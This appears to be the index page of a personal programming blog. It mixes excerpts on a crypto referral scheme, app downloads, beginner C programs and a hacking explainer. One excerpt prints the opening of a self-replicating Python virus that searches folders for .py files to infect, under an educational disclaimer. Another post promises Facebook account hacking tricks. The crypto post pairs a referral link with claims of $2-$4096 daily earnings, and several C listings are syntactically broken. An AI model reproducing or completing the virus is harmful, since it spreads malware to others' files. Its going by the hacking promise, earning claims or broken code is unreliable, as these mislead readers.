Posts

How Can We Invite Friends On Cryptohuge.. | Sandesh Acharya

Image
Some of  the people Don;t know how to invite friends on cryptohuge and earned money. Today I  am Showing You How to invite friends on cryptohuge. Lets Start the Video Let's  Rember these simple things While You Are Inviting the Freinds on Cryptohuge The affiliate program allows you to earn money on your invited guests (friends, acquaintances, relatives or other people) You post the URL on your own website, Facebook, a forum signature, tweet it, whatever. Someone clicks your referral link, and then makes a purchase on the service's site. The service sees that you sent them that there customer, and you earn a commission on the purchase. That means you get paid by the partner. The more people that click link, the higher the chance that you'll make some decent money. Which means getting a whole of internet traffic is the key part to making any kind of serious money with affiliate programs. Bitcoin affiliate programs allow affiliates to gain revenue by driving...

eBooks Mobile Application For Tech Students.>>By Sandesh Acharya

This Mobile is For Technical Students. This Apps Is Made for the Purpose of Gving Online ANd Offline Education for the technical Students. If Any One Want To Download This Apps..Please Fill Out The All Form And Download it. Name I Confirm That I Will Accept And Downloads eBooks For Tech Students.

Earn $2-$4096 Online /Day---Sandesh Acharya

Image
You Can Earn $2-$4096 from Cryptohuge Online For Learn How To Earn Wath The Video Below: Click This Link To Create Account on cryptohuge:     https://cryptohuge.com/index?ref=4382950

New EnglishFont>> Creator:Sandesh Acharya

Image
For New English Font Created By Snadesh Acharya. You Can Download It From A Link Below.: For Download This Font Fill All The Forms And CLick On Download Button Below:- Name I Confirm That I Will Accept And Downloads The Sandesh Acharya Font.

Creating A Simple Virus In Python. Creator:Sandesh Acharya

Image
Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you. This Tutorial  is  Only For Educations Purpose. #!/usr/bin/python import os import datetime SIGNATURE = "SIMPLE PYTHON VIRUS" def search(path): filestoinfect = [] filelist = os.listdir(path) for fname in filelist: if os.path.isdir(path+"/"+fname): filestoinfect.extend(search(path+"/"+fname)) elif fname[-3:] == ".py": infected = False for line in open(path+"/"+fname): if SIGNATURE in line: infected = True break if infected == False: filestoinfect.append(pa...

Do all Complex Calculations By Using This Application By Programmer Sandesh Acharya

Image
For doing all Of the Complex problem of Math You can Use This Application. By Using this Apps You Can do All of the Problem of math not by Using Formula. For Downloading this apps Click on the Download Button Below. Features of this App 1) You can convert foreign currency and nepali currency by using this app. 2) You can find length not by Using formula. 3) You can calculate the Bits and Bytes of a Computer. 4) You Can Convert Date And Time Easily By Using this App. 5) You Can Find Area by Using this app. 6) You can save much more time using this app. 7) You Can Calculate The Mass Also. म्याथ को हिसाब गर्न को लागि आयको छ अल्ल कन्भर्टर । यो अप्प्स् को पर्‍योग गरे र हजुर ले सजिलै म्याथ को हि साब सुत्र नलगाएरै गर्न सक्नुह्हुन्छ । यओ अप्प्स् डाउनलोड गर्न को लागि तल देअको डाउनलोड लिन्क मा क्लिक गर्नु होला । यओ अप्प्स् को बिशेषता हरु निम्न प्रकार को छ:- १) तपाईंले कुनै सुत्र न हनी किन्व सजिलै पैसा कोन्वेर्त ग...

What is Python Programming Language,Advantage And Disadvantage Of Python Programmming language And Its Application?

Image
What is Python Programming Language? The Python programming language is freely available and makes solving a computer problem almost as easy as writing out your thoughts about the solution. The code can be written once and run on almost any computer without needing to change the program.  Advantage And Disadvantage Of Python Programming Language? Advantages or Benefits of Python The Python language has diversified application in the software development companies such as in gaming, web frameworks and applications, language development, prototyping, graphic design applications, etc. This provides the language a higher plethora over other programming languages used in the industry. Some of its advantages are- Extensive Support Libraries It provides large standard libraries that include the areas like string operations, Internet, web service tools, operating system interfaces and protocols. Most of the highly used programming tasks are already scripted into it that li...

Our Mobile Apps... Sandesh Acharya Programs>>> ByProgrammer: Sandesh Acharya

Image
Sandesh Acharya Programming Mobile Apps Is Here. You Can Download It Form Here. This is Is Made By Sandesh Acharya. For Download Mobile Apps you Can Download. So,Click The Link BelowTO DOwnload it.  Download Link Of Apps Is Below: For Download This Apps You Can Enter You FirstName and Lastname And Also Click On CHeck Box to Download This Apps. Name I Confirm That I Will Accept And Downloads The Programming Books Apps.

How Can We hack Facebook Id Latest Tricks-2018 | By Programmers: Sandesh Acharya

Image
Nowdays, Facebook hacking is Increasing Day By Day. Today, I Show  You How TO Hack Facebook id Using Latest Tricks. For Videos Click Below TO See The Video. VIdeo Below:

What Is Hacking?Who is Hacker, Its Types And Tips For Priventing From Hackers.

What Is Hacking?   Hacking is identifying weakness in computer systems or networks to exploit its weaknesses to gain access. Example of Hacking: Using password cracking algorithm to gain access to a system Computers have become mandatory to run a successful businesses. It is not enough to have isolated computers systems; they need to be networked to facilitate communication with external businesses. This exposes them to the outside world and hacking. Hacking means using computers to commit fraudulent acts such as fraud, privacy invasion, stealing corporate/personal data, etc. Cyber crimes cost many organizations millions of dollars every year. Businesses need to protect themselves against such attacks.                               Hackers Can Hack Any Person By Giving Suspcious Virus, Worms, Message or Sending A Fake Link. Hackers Can Know Any Explicit And Weakness Of Others. Who is Hacker? ...

Write a Program In C to Check Whether the Inputted Year is Leap or not.(Programmed by Programmer:Sandesh Acharya)

The Program For Checking Whether a Inputted Year is Leap Or not is Given Below ...................... #include<stdio.h> main( ) { int year; printf ("Enter year:"); scanf ("%d", &year) ; if ((year%4 == 0 && year %100!=0) || year%400 == 0) printf ("%d is a leap year\n", year) ; else printf ("%d is not a leap year\n", year); return 0; }

Banking Principle Software in C Programming(Programmer:Sandesh Acharya)

Banking Principle Software In C-Programming Software Is made For Simple Mechanismon How The bank Is Operated. For Program You Can Click On Read more button below............. #include<iostream> #include<stdio.h> #include<conio.h> int main() { float draw,dep,transfer; char name[24]; float balance=5000; int account1,account,pin; int b,type; int transaction=1; printf("\n\t\t\t\tBANKING SYSTEM\n\n"); printf("\t\t\t\WELCOME TO SANDESH BANK\T\T\t\N"); printf("\t\t\t\t\t\t\t\t\t\n\"); printf("\t\t\t\t\t\t\t\t\t\n\"); printf("\n\t\t\t\tBANKING SYSTEM\n\n"); printf("Enter Your Name: "); scanf("%s",&name"); printf("\nPlease Enter Your Account noo.: "); scanf("%d",&type); whilee(transaction == 1) { int option; printf("\nChose What You Want To do\n"); printf("1 - Balance Enquiry\n"); printf("2 - Deposit\n"); printf(...

Write A Program In C To Calculate The Factorial of Inputted Number By A User.(Programmed By Sandesh Acharya)

Program for Calcualting the Factorial of Inputted Number ByUsers.. #include<stdio.h> main() { int num, i; long fact=1; printf(Enter a number which factorial is to be calculated:"); scanf("%d", &num); for(i=1; i<=num; i++) fact*=i; printf(The factorial is: %d",fact); return 0; }

Write A Program To Check You Are Eligible TO Cast Vote Or Not.(Programmed By Sandesh Acharya)

C Program to Check The You Are Eligible To Cast Vote Or Not. For Code Please Click On Read More For Full program Code..................... #include<stdio.h> main() { int num; printf("Enter your Age"); scanf("%d",num); if(num>=18) printf("You are Elegible to Cast Vote"); if(num<=18) printf("You are not Elegible to Cast Vote"); return 0; }

Write A Program In C To Prepare Marksheet And Marks Of All Subjects.(Programmed By Sandesh Acharya)

This is A Simple programming For Preparing And Calculating The Marks of All Subjects. For Full Program Click  On Read More......... #include<stdio.h> main() { int m1,m2,m3,m4,m5,m6,m7,m8,total; float per; printf("Enter Your marks In per 1000?"); printf("Enter the marks of Social Studies:"); scanf("%d",&m1); printf("Enter the marks of Science:"); scanf("%d",&m2); printf("Enter the marks of Nepali:"); scanf("%d",&m3); printf("Enter the marks of English:"); scanf("%d",&m4); printf("Enter the Marks of Math:"); scanf("%d",&m5); printf("Enter the marks of Moral:"); scanf("%d",&m6); printf("Enter the marks of Grammar:"); scanf("%d",&m7); printf("Enter the Marks of Computer:"); scanf("%d",&m8); total=m1+m2+m3+m4+m5+m6+m7+m8; printf("The t...

Text To Sound Converter Software made in notepad. (Programmed By Sandesh Acharya).

Image
The Text To Audio Converter is a Software for Converting Any Text to Audio.For Software Code See Below on Red Text................... Step 1: Open Notepad. Step2:Copy The Below Code And Paste it Into Notepad message = InputBox("A Best Text to Audio converter"+vbcrlf+"From - www.allusefulinfo.com","Text to Audio converter")  Set sapi = CreateObject("sapi.spvoice") sapi.Speak message Step3: Save It As .vbs Extension. or Follow This For Ready Made Software You Can Download It Form The Link Below.. CLick Here TO Download This Software

Write A Program in C To Check Whether A Alphabet Is Vowel or Consunaunt. (Programed By Sandesh Acharya)

Image
It Is The Simple Program To Check Whether a Entered Number is Vowel or Consunaunt. Please Click On Read More To See the Full Program. #include<stdio.h> main() { char(op); printf("Enter an Alphabet to check whether is vowel or consunaunt:"); scanf("%c",&op); switch(op) { case'a': printf(" It is a Vowel."); break; case'A': printf(" It is a vowel."); break; case'e': printf(" It is a vowel."); break; case'E': printf("It   is a vowel."); break; case'i': printf("  It  is a vowel."); break; case'I': printf("  It is a vowel."); break; case'o': printf("  It is a vowel."); break; case'O': printf("   It  is a vowel."); break; case'u': printf("  It  is a vowel."); break; case'U': printf("    It   is a vowel."); b...

Write A Program In C to Add Two Numbers. (Programmed By Sandesh Acharya)

Image
The Program TO Add Two Numbers In C is Very easy. We Can make Simple Calculator Apps Using C Programmming. Please Cick On Read More....To See The Program. #include<stdio.h> int main() { int a,b,s; printf("Enter a First Number: "); scanf("%d",&a); printf("Enter a Second number: "); scanf("%d",&b); s=a+b; printf("Sum of Two Numbers= %d",s); return 0; } For Video Click This Link Below.......